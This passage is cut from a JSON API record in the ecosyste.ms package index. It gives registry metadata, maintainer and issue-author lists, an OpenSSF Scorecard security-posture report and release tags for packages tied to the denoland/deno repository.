cosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":391,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fwin32-arm64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fwin32-arm64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fwin32-arm64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fwin32-arm64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fwin32-arm64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fwin32-arm64/codemeta","maintainers":[{"uuid":"ry","login":"ry","name":null,"email":"ry@tinyclouds.org","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~ry","role":null,"created_at":"2024-12-12T22:08:47.447Z","updated_at":"2024-12-12T22:08:47.447Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ry/packages"},{"uuid":"divy-work","login":"divy-work","name":null,"email":"dj.srivastava23@gmail.com","url":null,"packages_count":45,"html_url":"https://www.npmjs.com/~divy-work","role":null,"created_at":"2024-12-12T22:08:47.918Z","updated_at":"2024-12-12T22:08:47.918Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/divy-work/packages"},{"uuid":"denobot","login":"denobot","name":null,"email":"denobot@deno.com","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~denobot","role":null,"created_at":"2024-12-12T22:08:48.054Z","updated_at":"2024-12-12T22:08:48.054Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/denobot/packages"},{"uuid":"bartlomieju","login":"bartlomieju","name":null,"email":"biwanczuk@gmail.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~bartlomieju","role":null,"created_at":"2026-03-27T13:02:14.034Z","updated_at":"2026-03-27T13:02:14.034Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bartlomieju/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5836603,"maintainers_count":1249644,"namespaces_count":427708,"keywords_count":891347,"github":"npm","metadata":{"funded_packages_count":192785,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-04T05:03:39.333Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":5858419,"name":"pacstall-rs","ecosystem":"cargo","description":"An AUR-inspired package manager for Ubuntu","homepage":"https://github.com/denoland/deno","licenses":"GPL-3.0","normalized_licenses":["GPL-3.0"],"repository_url":"https://github.com/denoland/deno","keywords_array":["linux","package-manager","aur","pacstall","apt"],"namespace":null,"versions_count":2,"first_release_published_at":"2023-01-11T08:16:53.031Z","latest_release_published_at":"2023-01-11T08:22:04.820Z","latest_release_number":"2.0.0","last_synced_at":"2026-09-07T22:54:28.198Z","created_at":"2023-01-11T08:24:13.970Z","updated_at":"2026-09-08T04:46:32.908Z","registry_url":"https://crates.io/crates/pacstall-rs/","install_command":"cargo install pacstall-rs","documentation_url":"https://docs.rs/pacstall-rs/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10: